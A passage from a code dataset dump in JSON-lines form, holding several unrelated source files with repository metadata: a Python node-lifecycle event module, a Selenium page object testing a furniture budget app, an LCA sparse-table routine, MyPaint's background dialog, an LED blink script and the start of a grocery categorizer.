node.events import NodeCreatedEvent\nfrom node.events import NodeDetachedEvent\nfrom node.events import NodeModifiedEvent\nfrom node.events import NodeRemovedEvent\nfrom node.interfaces import IAttributesLifecycle\nfrom node.interfaces import ILifecycle\nfrom plumber import Behavior\nfrom plumber import default\nfrom plumber import plumb\nfrom zope.component.event import objectEventNotify\nfrom zope.interface import implementer\nimport threading\n\n\nclass LifecycleContext(threading.local):\n suppress_events = False\n\n\n_lifecycle_context = LifecycleContext()\n\n\n@contextmanager\ndef suppress_lifecycle_events():\n \"\"\"Context manager to suppress lifecycle events.\"\"\"\n _lifecycle_context.suppress_events = True\n try:\n yield\n finally:\n _lifecycle_context.suppress_events = False\n\n\n@implementer(ILifecycle)\nclass Lifecycle(Behavior):\n\n events = default({\n 'created': NodeCreatedEvent,\n 'added': NodeAddedEvent,\n 'modified': NodeModifiedEvent,\n 'removed': NodeRemovedEvent,\n 'detached': NodeDetachedEvent,\n })\n\n @plumb\n def __init__(next_, self, *args, **kw):\n next_(self, *args, **kw)\n objectEventNotify(self.events['created'](self))\n\n @plumb\n def __setitem__(next_, self, key, val):\n next_(self, key, val)\n if _lifecycle_context.suppress_events:\n return\n objectEventNotify(self.events['added'](\n val,\n newParent=self,\n newName=key\n ))\n\n @plumb\n def __delitem__(next_, self, key):\n delnode = self[key]\n next_(self, key)\n if _lifecycle_context.suppress_events:\n return\n objectEventNotify(self.events['removed'](\n delnode,\n oldParent=self,\n oldName=key\n ))\n\n @plumb\n def detach(next_, self, key):\n with suppress_lifecycle_events():\n node = next_(self, key)\n objectEventNotify(self.events['detached'](\n node,\n oldParent=self,\n oldName=key\n ))\n return node\n\n\n@implementer(IAttributesLifecycle)\nclass AttributesLifecycle(Behavior):\n\n @plumb\n def __setitem__(next_, self, key, val):\n next_(self, key, val)\n if _lifecycle_context.suppress_events:\n return\n objectEventNotify(self.__parent__.events['modified'](self.__parent__))\n\n @plumb\n def __delitem__(next_, self, key):\n next_(self, key)\n if _lifecycle_context.suppress_events:\n return\n objectEventNotify(self.__parent__.events['modified'](self.__parent__))\n","repo_name":"conestack/node","sub_path":"src/node/behaviors/lifecycle.py","file_name":"lifecycle.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"76"} +{"seq_id":"12551246059","text":"import time\nfrom base.selenium_driver import SeleniumDriver\nfrom pages.add_remove_product.add_remove_product_page import addRemoveProducts\n\n\nclass FurnitureBudget(SeleniumDriver):\n\n def __init__(self, driver):\n super().__init__(driver)\n self.driver = driver\n\n # project_card\n # Locators\n\n '''\n listing pages Getting budget values\n \n '''\n\n # Project name\n _title_name = \"//p[contains(text(),'Hareza Ikebukuro - P1')]\"\n _click_first_project = \"//p[contains(text(),'Avenida Circunvalacion del Club Golf Los Incas 170')]\"\n _bar = \"//div[1]/div[4]/div[1]/span[1]\"\n\n # pagination next\n _next = \"//li[contains(text(),'Next')]\"\n\n # pagination count\n _total_count = \"/html[1]/body[1]/div[1]/div[1]/div[4]/div[1]/div[1]/div[1]/div[2]/ul[1]/li[8]\"\n\n # title name\n _element_name = \"//p[contains(text(),'Central Plaza - P1')]\"\n\n # edit address link on detail page\n edit_address = \"//a[@class='budget-card-edit__anchor']\"\n\n # edit address text\n 
element = \"//p[contains(text(),'Furniture budget')]\"\n\n # add budget\n _budget_field = \"//input[@placeholder='$0.00']\"\n\n # save button\n _save_button = \"//span[contains(text(),'Save')]\"\n\n # values of budget, subtotal\n _subtotal = \"//div[@id='project-page-header-container']//div[3]//div[4]//p[2]\"\n _budget = \"//div[@id='project-page-header-container']//div[3]//div[3]//p[2]\"\n _budget_met = \"//div[@id='project-page-header-container']//div[3]//div[2]\"\n _add_budget_button = \"//a[@class='budget-card-add']\"\n _home_menu = \"//span[contains(.,'Home')]\"\n\n\n '''\n \n 1. Login to web app\n 2. Click on any product\n --- Check budget link available or not\n if available - click on budget link\n \n \n '''\n\n\n # Check if budget link is available then click on budget link else return to function.\n\n def addBudget(self):\n time.sleep(3)\n if self.isElementPresent(self._add_budget_button) == True:\n self.elementClick(self._add_budget_button)\n self.EnterBudget('11024.60')\n self.clickSaveButton()\n else:\n return\n\n # Enter Budget value using add budget link\n\n def enterBudget(self):\n time.sleep(2)\n self.waitForElement(self._click_first_project)\n self.elementClick(self._click_first_project)\n time.sleep(2)\n\n if self.isElementPresent(self._add_budget_button) == True:\n self.elementClick(self._add_budget_button)\n self.EnterBudget('11024.60')\n self.clickSaveButton()\n else:\n self.addEditBudget()\n time.sleep(2)\n self.EnterBudget('0')\n time.sleep(2)\n self.clickSaveButton()\n time.sleep(2)\n self.addBudget()\n\n # Enter negative value and verify it does not take it.\n\n def enterNegativeValue(self):\n time.sleep(3)\n if self.isElementPresent(self._add_budget_button) == True:\n self.log.info('negative value --add budget button available')\n self.elementClick(self._add_budget_button)\n self.EnterBudget('11024.60')\n self.clickSaveButton()\n else:\n self.log.info('negative value enter')\n self.addEditBudget()\n time.sleep(2)\n value = '-123'\n self.EnterBudget(value)\n time.sleep(2)\n self.clickSaveButton()\n time.sleep(2)\n neg_value = self.getText(self._budget)\n self.log.info(neg_value)\n self.log.info('negative value enter')\n if neg_value != value:\n return True\n else:\n return False\n\n # Edit budget function\n def addEditBudget(self):\n time.sleep(2)\n self.elementClick(self.element)\n time.sleep(2)\n self.elementClick(self.edit_address)\n time.sleep(2)\n\n # Enter budget function\n def EnterBudget(self, value):\n time.sleep(2)\n self.clearField(self._budget_field)\n time.sleep(2)\n self.sendKeys(value, self._budget_field)\n\n # save button function to save entered budget\n def clickSaveButton(self):\n self.elementClick(self._save_button)\n\n # Budget met def to calculate budget met or not.\n def budgetMet(self):\n self.addBudget()\n time.sleep(2)\n subtotal = self.getText(self._subtotal)\n self.ad = addRemoveProducts(self.driver)\n if subtotal == '-':\n self.ad.addRoomAssignment()\n subtotal = self.getText(self._subtotal)\n subtotal = subtotal.replace('$', '')\n time.sleep(2)\n self.webScroll(direction='up')\n self.addEditBudget()\n time.sleep(2)\n self.EnterBudget(subtotal)\n time.sleep(2)\n self.clickSaveButton()\n time.sleep(5)\n t = self.getText(self._budget_met)\n self.verifyTextContains(actualText=t, expectedText='Budget met!')\n time.sleep(2)\n self.elementClick(self._home_menu)\n time.sleep(5)\n bar_text = self.getText(self._bar)\n time.sleep(2)\n self.verifyTextContains(actualText=t, expectedText=bar_text)\n\n def budgetOver(self):\n 
self.elementClick(self._click_first_project)\n time.sleep(2)\n self.addBudget()\n time.sleep(2)\n budget = self.getText(self._budget)\n time.sleep(2)\n budget = budget.replace('$', '')\n budget = budget.replace(',', '')\n subtotal = self.getText(self._subtotal)\n subtotal = subtotal.replace('$', '')\n subtotal = subtotal.replace(',', '')\n if budget < subtotal:\n calculate = str(float(subtotal) - float(budget))\n budget = str(float(budget) - float(calculate))\n elif budget > subtotal:\n calculate = str(float(budget) - float(subtotal))\n value = float(5)\n calculate = str(float(calculate) + float(value))\n budget = str(float(budget) - float(calculate))\n elif budget == subtotal:\n value = float(5)\n budget = str(float(budget) - float(value))\n\n time.sleep(2)\n self.addEditBudget()\n time.sleep(2)\n self.EnterBudget(str(budget))\n time.sleep(2)\n self.clickSaveButton()\n time.sleep(3)\n trim1 = self.getText(self._budget_met)\n trim1 = trim1.split()\n trim1 = trim1[1]\n self.verifyTextContains(actualText=trim1, expectedText=\"over\")\n time.sleep(2)\n self.elementClick(self._home_menu)\n time.sleep(4)\n bar_text = self.getText(self._bar)\n time.sleep(2)\n self.verifyTextContains(actualText=bar_text, expectedText='$5.00 over')\n\n def budgetUnder(self):\n self.elementClick(self._click_first_project)\n time.sleep(2)\n self.addBudget()\n time.sleep(2)\n budget = self.getText(self._budget)\n time.sleep(2)\n budget = budget.replace('$', '')\n budget = budget.replace(',', '')\n subtotal = self.getText(self._subtotal)\n subtotal = subtotal.replace('$', '')\n subtotal = subtotal.replace(',', '')\n if budget < subtotal:\n calculate = str(float(subtotal) - float(budget))\n value = float(5)\n calculate = str(float(calculate) + float(value))\n budget = str(float(budget) + float(calculate))\n elif budget > subtotal:\n calculate = str(float(budget) - float(subtotal))\n budget = str(float(budget) + float(calculate))\n elif budget == subtotal:\n value = float(5)\n budget = str(float(budget) + float(value))\n\n time.sleep(2)\n self.addEditBudget()\n time.sleep(2)\n self.EnterBudget(str(budget))\n time.sleep(2)\n self.clickSaveButton()\n time.sleep(3)\n trim1 = self.getText(self._budget_met)\n trim1 = trim1.split()\n trim1 = trim1[1]\n self.verifyTextContains(actualText=trim1, expectedText=\"under\")\n time.sleep(2)\n self.elementClick(self._home_menu)\n time.sleep(4)\n bar_text = self.getText(self._bar)\n time.sleep(2)\n self.verifyTextContains(actualText=bar_text, expectedText='$5.00 under')\n\n\n # locators:\n _close_project_details = \"//span[contains(text(),'Close project details')]\"\n _expand_project_details = \"//span[contains(text(),'Expand project details')]\"\n\n # Click on project link to minimise it.\n def closeProjectLink(self):\n time.sleep(2)\n self.elementClick(self._click_first_project)\n time.sleep(5)\n self.elementClick(self._close_project_details)\n time.sleep(2)\n value = \"Expand project details\"\n get_value = self.getText(self._expand_project_details)\n time.sleep(2)\n self.verifyTextContains(actualText=get_value, expectedText=value)\n\n # Click on project link to maximise it.\n def expandProjectLink(self):\n time.sleep(5)\n self.elementClick(self._expand_project_details)\n time.sleep(2)\n value = \"Close project details\"\n get_value = self.getText(self._close_project_details)\n time.sleep(2)\n self.verifyTextContains(actualText=get_value, expectedText=value)\n\n # locators:\n\n _button_status = \"//div[@id='project-page-header-container']/div[1]\"\n _outer_button_status = 
'''//*[@id=\"root\"]/div/div[3]/div/div/div[1]/div[1]/div[1]/div[1]'''\n _first_notstarted = \"//div[@id='project-page-header-container']/div[2]/div/div[2]/p\"\n _second_inprogress = \"//div[@id='project-page-header-container']/div[2]/div/div[1]/p\"\n _third_done = \"//div[@id='project-page-header-container']/div[2]/div/div[3]/p\"\n _fourth_blocked = \"//div[@id='project-page-header-container']/div[2]/div/div[4]/p\"\n\n '''def projectStage(self):\n time.sleep(2)\n self.elementClick(self._button_status)\n time.sleep(2)\n self.elementClick(self._third_done)\n time.sleep(5)\n a = self.getText(self._button_status)\n time.sleep(5)\n self.elementClick(self._home_menu)\n time.sleep(2)\n b = self.getText(self._outer_button_status)\n self.verifyTextContains(actualText=a, expectedText=b)\n\n def projectStatus1(self):\n self.elementClick(self._button_status)\n time.sleep(2)\n self.elementClick(self._second_inprogress)\n time.sleep(3)\n aa = self.getText(self._button_status)\n time.sleep(3)\n self.elementClick(self._home_menu)\n time.sleep(5)\n outer_button_status = self.getText(self._outer_button_status)\n time.sleep(2)\n self.verifyTextContains(actualText=aa, expectedText=outer_button_status)\n\n def projectStatus2(self):\n self.elementClick(self._click_first_project)\n time.sleep(3)\n self.elementClick(self._button_status)\n time.sleep(2)\n self.elementClick(self._fourth_blocked)\n time.sleep(3)\n text = self.getText(self._button_status)\n time.sleep(2)\n self.elementClick(self._home_menu)\n time.sleep(5)\n obs = self.getText(self._outer_button_status)\n self.verifyTextContains(actualText=text, expectedText=obs)\n\n def projectStatus3(self):\n self.elementClick(self._click_first_project)\n time.sleep(2)\n self.elementClick(self._button_status)\n time.sleep(2)\n self.elementClick(self._first_notstarted)\n time.sleep(2)\n aaa = self.getText(self._button_status)\n time.sleep(5)\n self.elementClick(self._home_menu)\n time.sleep(5)\n bbb = self.getText(self._outer_button_status)\n self.verifyTextContains(actualText=aaa, expectedText=bbb)'''\n\n # LOCATORS\n\n # stargate link on detail page\n _stargate_link_detail_page = \"//span[@class='stargate']\"\n\n # stargate page logo\n _stargate_site_logo = \"//img[@id='login-logo']\"\n\n # Click on stargate link to verify link navigation and check navigation is going correct.\n\n\n def clickStargateLink(self):\n time.sleep(2)\n self.waitForElement(self._click_first_project)\n self.elementClick(self._click_first_project)\n time.sleep(2)\n self.waitForElement(self._stargate_link_detail_page)\n window_before = self.driver.window_handles[0]\n self.elementClick(self._stargate_link_detail_page)\n window_after = self.driver.window_handles[1]\n\n # switch on to new child window\n self.driver.switch_to.window(window_after)\n self.isElementDisplayed(self._stargate_site_logo)\n return True\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"dynamicsagar/furnish","sub_path":"pages/furniture_budget/furniture_budget_pages.py","file_name":"furniture_budget_pages.py","file_ext":"py","file_size_in_byte":12603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18948063368","text":"# N: 頂点数\n# G[v]: 頂点vの子頂点 (親頂点は含まない)\nN = ...\nG = [[...] 
for i in range(N)]\n\n# Euler Tour Technique\nS = []\nF = [0]*N\ndepth = [0]*N\ndef dfs(v, d):\n F[v] = len(S)\n depth[v] = d\n S.append(v)\n for w in G[v]:\n dfs(w, d+1)\n S.append(v)\ndfs(0, 0)\n\n# Disjoint Sparse Tableの構築\nINF = (N, None)\n \nLV = (2*N-1).bit_length()\nN0 = 2**LV\ntable = [[None]*N0 for i in range(LV)]\n \nS0 = [INF]*N0\nfor i, v in enumerate(S):\n S0[i] = (depth[v], v)\n \nsz = N0; hf = N0 >> 1\nfor k in range(LV):\n table_k = table[k]\n for i in range(hf, N0, sz):\n table_k[i-1] = r = S0[i-1]\n for j in range(i-2, i-hf-1, -1):\n table_k[j] = r = min(S0[j], r)\n \n table_k[i] = r = S0[i]\n for j in range(i+1, i+hf):\n table_k[j] = r = min(S0[j], r)\n sz >>= 1; hf >>= 1\n \n# LCAの計算\ndef query(u, v):\n if u == v:\n return u\n fu = F[u]; fv = F[v]\n if fu > fv:\n fu, fv = fv, fu\n \n k2 = (fu ^ fv).bit_length()\n table_l = table[LV - k2]\n ans = table_l[fu]\n if fv & ((1 << k2) - 1):\n ans = min(ans, table_l[fv])\n return ans[1]","repo_name":"tjkendev/procon-library","sub_path":"python/graph/lca-dst.py","file_name":"lca-dst.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"76"} +{"seq_id":"36243036318","text":"# import sys\n\n# try:\n# \tf = open('text.txt')\n# \ts = f.readline()\n# \tprint(s)\n# \ti = int(s.strip())\n# except OSError as err:\n# \tprint(\"OS error: {0}\".format(err))\n# except ValueError:\n# \tprint(\"Could not data into integer.\")\n# except:\n# \tprint(\"Unexpected error: \", sys.exc_info()[0])\n# \traise\n\nwith open('text.txt') as f:\n\tfile_data = f.read()\n\tprint(file_data)\n\nf.close()","repo_name":"bmwasaru/class","sub_path":"file_read.py","file_name":"file_read.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14921464239","text":"from __future__ import division, print_function\nimport os\nimport sys\nimport logging\n\nfrom gettext import gettext as _\nfrom lib.gibindings import Gtk\nfrom lib.gibindings import GdkPixbuf\n\nfrom . import pixbuflist\nfrom . 
import windowing\nfrom lib import tiledsurface\nfrom lib import helpers\nimport lib.pixbuf\nfrom lib.pycompat import unicode\nfrom lib.pycompat import xrange\n\nlogger = logging.getLogger(__name__)\n\n## Settings and consts\n\nN = tiledsurface.N\nDEFAULT_BACKGROUND = 'default.png'\nFALLBACK_BACKGROUND = 'mrmamurk/mamurk_e_1.png'\nBACKGROUNDS_SUBDIR = 'backgrounds'\nRESPONSE_SAVE_AS_DEFAULT = 1\nBLOAT_MAX_SIZE = 1024\n\n\n## Class defs\n\nclass BackgroundWindow (windowing.Dialog):\n\n def __init__(self):\n from gui import application\n app = application.get_app()\n assert app is not None\n\n windowing.Dialog.__init__(\n self,\n app=app,\n title=_('Background'),\n modal=True\n )\n self.add_button(_('Save as Default'), RESPONSE_SAVE_AS_DEFAULT)\n self.add_button(Gtk.STOCK_OK, Gtk.ResponseType.ACCEPT)\n\n self._current_background_pixbuf = None # set when changed\n\n # Set up window.\n self.connect('response', self._response_cb)\n\n notebook = self.nb = Gtk.Notebook()\n self.vbox.pack_start(notebook, True, True, 0)\n\n # Set up patterns tab.\n patterns_scroll = Gtk.ScrolledWindow()\n patterns_scroll.set_policy(\n Gtk.PolicyType.NEVER,\n Gtk.PolicyType.AUTOMATIC,\n )\n notebook.append_page(patterns_scroll, Gtk.Label(label=_('Pattern')))\n\n self.bgl = BackgroundList(self)\n patterns_scroll.add(self.bgl)\n\n self.connect(\"realize\", self._realize_cb)\n self.connect(\"show\", self._show_cb)\n self.connect(\"hide\", self._hide_cb)\n\n # Set up colors tab.\n color_vbox = Gtk.VBox()\n notebook.append_page(color_vbox, Gtk.Label(label=_('Color')))\n\n self.cs = Gtk.ColorSelection()\n self.cs.connect('color-changed', self._color_changed_cb)\n color_vbox.pack_start(self.cs, True, True, 0)\n\n b = Gtk.Button(label=_('Add color to Patterns'))\n b.connect('clicked', self._add_color_to_patterns_cb)\n color_vbox.pack_start(b, False, True, 0)\n\n def _realize_cb(self, dialog):\n if not self.bgl.initialized:\n self.bgl.initialize()\n\n def _show_cb(self, dialog):\n self._current_background_pixbuf = None\n self.set_response_sensitive(RESPONSE_SAVE_AS_DEFAULT, False)\n\n def _hide_cb(self, dialog):\n self._current_background_pixbuf = None\n\n def _response_cb(self, dialog, response, *args):\n if response == RESPONSE_SAVE_AS_DEFAULT:\n self._save_as_default_cb()\n elif response == Gtk.ResponseType.ACCEPT:\n self.hide()\n\n def _color_changed_cb(self, widget):\n pixbuf = self._get_selected_color_pixbuf()\n self.set_background(pixbuf)\n\n def _get_selected_color_pixbuf(self):\n rgb = self.cs.get_current_color()\n rgb = (rgb.red, rgb.green, rgb.blue)\n rgb = (c / 0xffff for c in rgb)\n pixbuf = new_blank_pixbuf(rgb, N, N)\n return pixbuf\n\n def _save_as_default_cb(self):\n pixbuf = self._current_background_pixbuf\n assert pixbuf is not None, \"BG pixbuf was not changed.\"\n path = os.path.join(\n self.app.user_datapath,\n BACKGROUNDS_SUBDIR,\n DEFAULT_BACKGROUND,\n )\n lib.pixbuf.save(pixbuf, path, 'png')\n self.hide()\n\n def set_background(self, pixbuf):\n doc = self.app.doc.model\n doc.layer_stack.set_background(pixbuf, make_default=True)\n self._current_background_pixbuf = pixbuf\n self.set_response_sensitive(RESPONSE_SAVE_AS_DEFAULT, True)\n\n def _add_color_to_patterns_cb(self, widget):\n pixbuf = self._get_selected_color_pixbuf()\n i = 1\n while True:\n filename = os.path.join(self.app.user_datapath,\n BACKGROUNDS_SUBDIR,\n 'color%02d.png' % i)\n if not os.path.exists(filename):\n break\n i += 1\n lib.pixbuf.save(pixbuf, filename, 'png')\n self.bgl.backgrounds.append(pixbuf)\n self.bgl.update()\n 
self.bgl.set_selected(pixbuf)\n self.nb.set_current_page(0)\n\n\nclass BackgroundList (pixbuflist.PixbufList):\n\n _SUFFIXES = ('.jpg', '.jpeg', '.png')\n\n def __init__(self, win):\n pixbuflist.PixbufList.__init__(\n self,\n None,\n N, N,\n namefunc=self._get_tooltip,\n pixbuffunc=self._get_preview_pixbuf,\n )\n self.app = win.app\n self.win = win\n\n stock_path = os.path.join(self.app.datapath, BACKGROUNDS_SUBDIR)\n user_path = os.path.join(self.app.user_datapath, BACKGROUNDS_SUBDIR)\n if not os.path.isdir(user_path):\n os.mkdir(user_path)\n\n self._background_files = self._list_dir(stock_path)\n self._background_files.sort()\n self._background_files += self._list_dir(user_path)\n\n # Exclude DEFAULT_BACKGROUND from the list shown to the user\n for filename in reversed(self._background_files):\n file_basename = os.path.basename(filename)\n if file_basename.lower() == DEFAULT_BACKGROUND:\n self._background_files.remove(filename)\n\n self._pixbuf_tooltip = {}\n self._pixbufs_scaled = {} # lazily loaded by self.initialize()\n self.backgrounds = []\n\n self.item_selected += self._item_selected_cb\n\n @classmethod\n def _list_dir(cls, path):\n \"\"\"Recursively find images by suffix\"\"\"\n contents = []\n for dir_path, dir_subdirs, dir_files in os.walk(path):\n for file_name in dir_files:\n is_matched = False\n file_name_lowercase = file_name.lower()\n for suffix in cls._SUFFIXES:\n if not file_name_lowercase.endswith(suffix):\n continue\n is_matched = True\n break\n if is_matched:\n file_path = os.path.join(dir_path, file_name)\n contents.append(file_path)\n contents.sort(key=os.path.getmtime)\n return contents\n\n @property\n def initialized(self):\n return len(self.backgrounds) != 0\n\n def initialize(self):\n self.backgrounds = self._load_pixbufs(self._background_files)\n self.set_itemlist(self.backgrounds)\n\n def _load_pixbufs(self, files, exclude_default=False):\n pixbufs = []\n load_errors = []\n for filename in files:\n is_matched = False\n for suffix in self._SUFFIXES:\n if not filename.lower().endswith(suffix):\n continue\n is_matched = True\n break\n if not is_matched:\n logger.warning(\n \"Excluding %r: not in %r\",\n filename,\n self._SUFFIXES,\n )\n continue\n pixbuf, errors = load_background(filename)\n if errors:\n for err in errors:\n logger.error(\"Error loading %r: %r\", filename, err)\n load_errors.append(err)\n continue\n if os.path.basename(filename).lower() == DEFAULT_BACKGROUND:\n if exclude_default:\n logger.warning(\"Excluding %r: is default background (%r)\",\n filename, DEFAULT_BACKGROUND)\n continue\n pixbufs.append(pixbuf)\n tooltip = _filename_to_display(filename)\n self._pixbuf_tooltip[pixbuf] = tooltip\n\n if load_errors:\n msg = \"\\n\\n\".join(load_errors)\n self.app.message_dialog(\n text=_(\"One or more backgrounds could not be loaded\"),\n title=_(\"Error loading backgrounds\"),\n secondary_text=_(\"Please remove the unloadable files, or \"\n \"check your libgdkpixbuf installation.\"),\n long_text=msg,\n message_type=Gtk.MessageType.WARNING,\n modal=True,\n )\n\n logger.info(\"Loaded %d of %d background(s), with %d error(s)\",\n len(pixbufs), len(files), len(errors))\n return pixbufs\n\n def _get_preview_pixbuf(self, pixbuf):\n if pixbuf in self._pixbufs_scaled:\n return self._pixbufs_scaled[pixbuf]\n w, h = pixbuf.get_width(), pixbuf.get_height()\n if w == N and h == N:\n return pixbuf\n assert w >= N\n assert h >= N\n scale = max(0.25, N / min(w, h))\n scaled = new_blank_pixbuf((0, 0, 0), N, N)\n pixbuf.composite(\n dest=scaled,\n dest_x=0, 
dest_y=0,\n dest_width=N, dest_height=N,\n offset_x=0, offset_y=0,\n scale_x=scale, scale_y=scale,\n interp_type=GdkPixbuf.InterpType.BILINEAR,\n overall_alpha=255,\n )\n self.app.pixmaps.plus.composite(\n dest=scaled,\n dest_x=0, dest_y=0,\n dest_width=N, dest_height=N,\n offset_x=0, offset_y=0,\n scale_x=1.0, scale_y=1.0,\n interp_type=GdkPixbuf.InterpType.BILINEAR,\n overall_alpha=255,\n )\n self._pixbufs_scaled[pixbuf] = scaled\n return scaled\n\n def _get_tooltip(self, pixbuf):\n return self._pixbuf_tooltip.get(pixbuf, None)\n\n def _item_selected_cb(self, self_, pixbuf):\n self.win.set_background(pixbuf)\n\n\n## Helpers\n\n\ndef _filename_to_display(s):\n \"\"\"Convert a str filename to Unicode without obsessing too much.\"\"\"\n # That said, try to be be correct about Windows/POSIX weirdness.\n if not isinstance(s, unicode):\n if sys.platform == \"win32\":\n enc = \"UTF-8\" # always, and sys.getfilesystemencoding() breaks\n else:\n enc = sys.getfilesystemencoding()\n s = s.decode(enc, \"replace\")\n return s\n\n\ndef new_blank_pixbuf(rgb, w, h):\n \"\"\"Create a blank pixbuf with all pixels set to a color\n\n :param tuple rgb: Color to blank the pixbuf to (``R,G,B``, floats)\n :param int w: Width for the new pixbuf\n :param int h: Width for the new pixbuf\n\n The returned pixbuf has no alpha channel.\n\n \"\"\"\n pixbuf = GdkPixbuf.Pixbuf.new(\n GdkPixbuf.Colorspace.RGB, False, 8,\n w, h,\n )\n r, g, b = (helpers.clamp(int(round(0xff * x)), 0, 0xff) for x in rgb)\n rgba_pixel = (r << 24) + (g << 16) + (b << 8) + 0xff\n pixbuf.fill(rgba_pixel)\n return pixbuf\n\n\ndef load_background(filename, bloatmax=BLOAT_MAX_SIZE):\n \"\"\"Load a pixbuf, testing it for suitability as a background\n\n :param str filename: Full path to the filename to load.\n :param int bloatmax: Repeat up to this size\n :rtype: tuple\n\n The returned tuple is a pair ``(PIXBUF, ERRORS)``,\n where ``ERRORS`` is a list of localized strings\n describing the errors encountered,\n and ``PIXBUF`` contains the loaded background pixbuf.\n If there were errors, ``PIXBUF`` is None.\n\n The MyPaint rendering engine can only manage\n background layers which fit into its tile structure.\n Formerly, only background images with dimensions\n which were exact multiples of the tile size were permitted.\n We have a couple of workarounds now:\n\n * \"Bloating\" the background by repetition (pixel-perfect)\n * Scaling the image down to fit (distorts the image)\n\n \"\"\"\n filename_display = _filename_to_display(filename)\n load_errors = []\n try:\n pixbuf = GdkPixbuf.Pixbuf.new_from_file(filename)\n except Exception as ex:\n logger.error(\"Failed to load background %r: %s\", filename, ex)\n msg = unicode(_(\n 'Gdk-Pixbuf couldn\\'t load \"{filename}\", and reported \"{error}\"'\n ))\n load_errors.append(msg.format(\n filename=filename_display,\n error=repr(ex),\n ))\n return (None, load_errors)\n # Validity check\n w, h = pixbuf.get_width(), pixbuf.get_height()\n if w == 0 or h == 0:\n msg = unicode(_(\"{filename} has zero size (w={w}, h={h})\"))\n load_errors.append(msg.format(\n filename=filename_display,\n w=w, h=h,\n ))\n return (None, load_errors)\n # Flatten\n if pixbuf.get_has_alpha():\n logger.warning(\n \"%r has an alpha channel, which should be removed manually\",\n filename,\n )\n new_pixbuf = new_blank_pixbuf((0, 0, 0), w, h)\n pixbuf.composite(\n dest=new_pixbuf,\n dest_x=0, dest_y=0,\n dest_width=w, dest_height=h,\n offset_x=0, offset_y=0,\n scale_x=1.0, scale_y=1.0,\n interp_type=GdkPixbuf.InterpType.NEAREST,\n 
overall_alpha=255,\n )\n pixbuf = new_pixbuf\n logger.debug(\n \"Flattened %s by compositing it onto a black backdrop\",\n filename,\n )\n # Attempt to fit the image into our grid.\n exact_fit = ((w % N, h % N) == (0, 0))\n if not exact_fit:\n logger.warning(\n \"%r (%dx%d) does not fit the %dx%d tile grid exactly\",\n filename,\n w, h,\n N, N,\n )\n repeats_x = _best_nrepeats_for_scaling(w, bloatmax)\n repeats_y = _best_nrepeats_for_scaling(h, bloatmax)\n if repeats_x > 1 or repeats_y > 1:\n logger.info(\n \"Tiling %r to %dx%d (was: %dx%d, repeats: %d vert, %d horiz)\",\n filename,\n w * repeats_x, h * repeats_y,\n w, h,\n repeats_x, repeats_y,\n )\n pixbuf = _tile_pixbuf(pixbuf, repeats_x, repeats_y)\n w, h = pixbuf.get_width(), pixbuf.get_height()\n if (w % N != 0) or (h % N != 0):\n orig_w, orig_h = w, h\n w = max(1, w // N) * N\n h = max(1, h // N) * N\n logger.info(\n \"Scaling %r to %dx%d (was: %dx%d)\",\n filename,\n w, h,\n orig_w, orig_h,\n )\n pixbuf = pixbuf.scale_simple(\n dest_width=w, dest_height=h,\n interp_type=GdkPixbuf.InterpType.BILINEAR,\n )\n assert (w % N == 0) and (h % N == 0)\n if load_errors:\n pixbuf = None\n return pixbuf, load_errors\n\n\ndef _tile_pixbuf(pixbuf, repeats_x, repeats_y):\n \"\"\"Make a repeated tiled image of a pixbuf\"\"\"\n w, h = pixbuf.get_width(), pixbuf.get_height()\n result = new_blank_pixbuf((0, 0, 0), repeats_x * w, repeats_y * h)\n for xi in xrange(repeats_x):\n for yi in xrange(repeats_y):\n pixbuf.copy_area(0, 0, w, h, result, w * xi, h * yi)\n return result\n\n\ndef _best_nrepeats_for_scaling(src_size, max_dest_size):\n min_remainder = N\n min_remainder_nrepeats = 1\n nrepeats = 0\n dest_size = 0\n while dest_size <= max_dest_size:\n nrepeats += 1\n dest_size += src_size\n remainder = dest_size % N\n if remainder < min_remainder:\n min_remainder_nrepeats = nrepeats\n min_remainder = remainder\n if remainder == 0:\n break\n return min_remainder_nrepeats\n","repo_name":"mypaint/mypaint","sub_path":"gui/backgroundwindow.py","file_name":"backgroundwindow.py","file_ext":"py","file_size_in_byte":15394,"program_lang":"python","lang":"en","doc_type":"code","stars":2400,"dataset":"github-code","pt":"76"} +{"seq_id":"42549779047","text":"#!/usr/bin/env python\n\"\"\"\nDescription : Blink an LED\nAuthor : Russell\nE-mail : russellshome@gmail.com\nDate : 2020/08/26\nCircuit : https://crcit.net/c/98db0b1c4bcc420fbb3f02dd2a52553a\n\"\"\"\nfrom gpiozero import LED\nfrom time import sleep\nprint(__doc__)\nled = LED(17)\nwhile True:\n led.on()\n sleep(1)\n led.off()\n sleep(1)","repo_name":"russellshome/python","sub_path":"gpiozero/blink.py","file_name":"blink.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31763242129","text":"from enum import Enum\n\n# Description of each ItemCategory.\ncategoryDescription = {\n \"UNKNOWN\": \"Övrigt\",\n \"GREEN\": \"Grönt\",\n \"DAIRY\": \"Mjölk/ost\",\n \"BREAD\": \"Bröd\",\n \"MEAT\": \"Kött/fisk\",\n \"BASIC\": \"Basvaror\",\n \"CARBS\": \"kolhydrater\",\n}\n# Keywords to search for when categorizing.\ncategoryKeywords = {\n \"GREEN\": [\n \"lök\",\n \"paprika\",\n \"gurka\",\n \"tomat\",\n \"sallad\",\n \"potatis\",\n \"zucchini\",\n \"frukt\",\n \"äppel\",\n \"apelsin\",\n \"aubergine\",\n \"ananas\",\n \"basilika\",\n \"koriander\",\n \"broccoli\",\n \"pumpa\",\n \"nötter\",\n \"citron\",\n \"äpple\",\n \"dill\",\n \"timjan\",\n \"tranbär\",\n \"kål\",\n \"bönor\",\n \"frön\",\n \"salvia\",\n 
